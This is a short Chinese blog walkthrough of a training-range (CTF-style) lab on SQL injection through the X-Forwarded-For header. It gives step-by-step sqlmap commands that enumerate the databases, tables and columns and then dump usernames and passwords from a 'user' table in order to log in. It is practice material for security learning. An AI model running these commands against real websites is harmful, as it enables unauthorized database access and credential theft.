01#墨者靶场-X-Forwarded-For注入漏洞实战

                                                                                墨者学习01

                                                                               By/shy014

1.在网站登陆处抓包,发现提示IP已被记录。

2.添加X-Forwarded-For字段,随意给予IP,发现被记录的IP发生了更改,说明X-Forwarded-For字段的内容可控,且很有可能保存在数据库当中

3.将数据包保存为TXT文件,并将X-Forwarded-For字段内容置为*,提示sqlmap该处存在sql注入漏洞。

python2 sqlmap.py -r C:\Users\shy\Desktop\444.txt

4.读取数据库:python2 sqlmap.py -r C:\Users\shy\Desktop\444.txt --dbs -v 3

扫描二维码关注公众号,回复: 9966689 查看本文章

5.获得表名:python2 sqlmap.py -r C:\Users\shy\Desktop\444.txt -D webcalendar --tables

6.获得字段:python2 sqlmap.py -r C:\Users\shy\Desktop\444.txt -D webcalendar -T user –columns

7.获得内容:python2 sqlmap.py -r C:\Users\shy\Desktop\444.txt -D webcalendar -T user -C"id ,password,username" –dump

8.登陆网站,获得key

 

发布了41 篇原创文章 · 获赞 5 · 访问量 1万+

猜你喜欢

转载自blog.csdn.net/qq_32393893/article/details/103080684